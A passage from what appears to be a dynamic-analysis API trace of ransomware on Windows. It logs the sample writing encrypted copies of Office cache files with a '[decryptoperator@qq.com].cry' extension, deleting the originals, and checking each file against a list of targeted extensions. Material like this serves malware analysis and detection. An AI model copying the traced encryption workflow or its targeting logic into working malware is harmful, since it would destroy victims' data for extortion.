users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0036.520] GetLastError () returned 0x0 [0036.520] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x1915, lpOverlapped=0x0) returned 1 [0036.526] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x1920, lpOverlapped=0x0) returned 1 [0036.527] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.527] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xee, lpOverlapped=0x0) returned 1 [0036.527] SetEndOfFile (hFile=0x17c) returned 1 [0036.527] CloseHandle (hObject=0x17c) returned 1 [0036.532] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.532] SetEndOfFile (hFile=0x18c) returned 1 [0036.533] CloseHandle (hObject=0x18c) returned 1 [0036.533] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.533] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml")) returned 1 [0036.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.533] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.533] lstrlenW (lpString=".doc") returned 4 [0036.534] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString=".docx") returned 5 [0036.534] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.534] lstrlenW (lpString=".pdf") returned 4 [0036.534] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString=".xls") returned 4 [0036.534] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString=".xlsx") returned 5 [0036.534] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.534] lstrlenW (lpString=".ppt") returned 4 [0036.534] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.534] lstrlenW (lpString=".zip") returned 4 [0036.534] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.534] lstrlenW (lpString=".rar") returned 4 [0036.534] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString=".bz2") returned 4 [0036.534] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString=".7z") returned 3 [0036.534] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.534] lstrlenW (lpString=".dbf") returned 4 [0036.534] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.534] lstrlenW (lpString=".1cd") returned 4 [0036.534] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.534] lstrlenW (lpString=".jpg") returned 4 [0036.534] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.534] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.534] lstrlenW (lpString=".doc") returned 4 [0036.534] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString=".docx") returned 5 [0036.535] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0036.535] lstrlenW (lpString=".pdf") returned 4 [0036.535] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString=".xls") returned 4 [0036.535] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString=".xlsx") returned 5 [0036.535] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0036.535] lstrlenW (lpString=".ppt") returned 4 [0036.535] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.535] lstrlenW (lpString=".zip") returned 4 [0036.535] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.535] lstrlenW (lpString=".rar") returned 4 [0036.535] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString=".bz2") returned 4 [0036.535] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString=".7z") returned 3 [0036.535] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.535] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.535] lstrlenW (lpString=".dbf") returned 4 [0036.535] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.535] lstrlenW (lpString=".1cd") returned 4 [0036.535] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.535] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 76 [0036.535] lstrlenW (lpString=".jpg") returned 4 [0036.535] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.535] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.535] lstrlenW (lpString="Setup.xml") returned 9 [0036.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.536] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=16683) returned 1 [0036.536] CloseHandle (hObject=0x18c) returned 1 [0036.536] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.536] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0036.536] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.536] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.536] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0036.536] GetLastError () returned 0x0 [0036.537] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x412b, lpOverlapped=0x0) returned 1 [0036.875] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x4130, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x4130, lpOverlapped=0x0) returned 1 [0036.877] ReadFile (in: hFile=0x18c, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.877] WriteFile (in: hFile=0x17c, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.877] SetEndOfFile (hFile=0x17c) returned 1 [0036.877] CloseHandle (hObject=0x17c) returned 1 [0036.878] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.878] SetEndOfFile (hFile=0x18c) returned 1 [0036.879] CloseHandle (hObject=0x18c) returned 1 [0036.879] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.050] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0037.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.050] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.050] lstrlenW (lpString=".doc") returned 4 [0037.050] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.050] lstrlenW (lpString=".docx") returned 5 [0037.050] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.050] lstrlenW (lpString=".pdf") returned 4 [0037.050] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.050] lstrlenW (lpString=".xls") returned 4 [0037.050] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.050] lstrlenW (lpString=".xlsx") returned 5 [0037.050] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.050] lstrlenW (lpString=".ppt") returned 4 [0037.050] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.051] lstrlenW (lpString=".zip") returned 4 [0037.051] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.051] lstrlenW (lpString=".rar") returned 4 [0037.051] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".bz2") returned 4 [0037.051] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".7z") returned 3 [0037.051] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.051] lstrlenW (lpString=".dbf") returned 4 [0037.051] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.051] lstrlenW (lpString=".1cd") returned 4 [0037.051] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.051] lstrlenW (lpString=".jpg") returned 4 [0037.051] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.051] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.051] lstrlenW (lpString=".doc") returned 4 [0037.051] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".docx") returned 5 [0037.051] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0037.051] lstrlenW (lpString=".pdf") returned 4 [0037.051] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".xls") returned 4 [0037.051] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.051] lstrlenW (lpString=".xlsx") returned 5 [0037.051] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0037.051] lstrlenW (lpString=".ppt") returned 4 [0037.051] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.052] lstrlenW (lpString=".zip") returned 4 [0037.052] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.052] lstrlenW (lpString=".rar") returned 4 [0037.052] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".bz2") returned 4 [0037.052] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString=".7z") returned 3 [0037.052] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.052] lstrlenW (lpString=".dbf") returned 4 [0037.052] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.052] lstrlenW (lpString=".1cd") returned 4 [0037.052] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.052] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0037.052] lstrlenW (lpString=".jpg") returned 4 [0037.052] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.052] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0037.052] lstrlenW (lpString="Office32WW.xml") returned 14 [0037.052] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.054] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=4274) returned 1 [0037.054] CloseHandle (hObject=0x180) returned 1 [0037.054] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 0x2020 [0037.054] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.054] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.054] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.054] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.054] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0037.054] GetLastError () returned 0x0 [0037.054] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x10b2, lpOverlapped=0x0) returned 1 [0037.097] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x10c0, lpOverlapped=0x0) returned 1 [0037.098] ReadFile (in: hFile=0x180, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.098] WriteFile (in: hFile=0x164, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0037.099] SetEndOfFile (hFile=0x164) returned 1 [0037.099] CloseHandle (hObject=0x164) returned 1 [0037.099] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.099] SetEndOfFile (hFile=0x180) returned 1 [0037.100] CloseHandle (hObject=0x180) returned 1 [0037.100] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0037.100] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.xml")) returned 1 [0037.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.101] lstrlenW (lpString=".doc") returned 4 [0037.101] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString=".docx") returned 5 [0037.101] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.101] lstrlenW (lpString=".pdf") returned 4 [0037.101] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString=".xls") returned 4 [0037.101] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString=".xlsx") returned 5 [0037.101] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.101] lstrlenW (lpString=".ppt") returned 4 [0037.101] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.101] lstrlenW (lpString=".zip") returned 4 [0037.101] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.101] lstrlenW (lpString=".rar") returned 4 [0037.101] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString=".bz2") returned 4 [0037.101] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString=".7z") returned 3 [0037.101] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.101] lstrlenW (lpString=".dbf") returned 4 [0037.101] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.101] lstrlenW (lpString=".1cd") returned 4 [0037.101] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.101] lstrlenW (lpString=".jpg") returned 4 [0037.101] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.102] lstrlenW (lpString=".doc") returned 4 [0037.102] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString=".docx") returned 5 [0037.102] lstrcmpiW (lpString1=".docx", lpString2="W.xml") returned -1 [0037.102] lstrlenW (lpString=".pdf") returned 4 [0037.102] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString=".xls") returned 4 [0037.102] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString=".xlsx") returned 5 [0037.102] lstrcmpiW (lpString1=".xlsx", lpString2="W.xml") returned -1 [0037.102] lstrlenW (lpString=".ppt") returned 4 [0037.102] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.102] lstrlenW (lpString=".zip") returned 4 [0037.102] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.102] lstrlenW (lpString=".rar") returned 4 [0037.102] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString=".bz2") returned 4 [0037.102] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString=".7z") returned 3 [0037.102] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.102] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.102] lstrlenW (lpString=".dbf") returned 4 [0037.102] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.102] lstrlenW (lpString=".1cd") returned 4 [0037.102] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.102] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 77 [0037.102] lstrlenW (lpString=".jpg") returned 4 [0037.102] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.103] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0037.103] lstrlenW (lpString="Setup.xml") returned 9 [0037.103] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.103] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=20577) returned 1 [0037.103] CloseHandle (hObject=0x180) returned 1 [0037.103] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0037.103] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0037.103] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0037.103] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.103] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.103] CreateFileW (lpFileName="C:\\MSOCache\\All 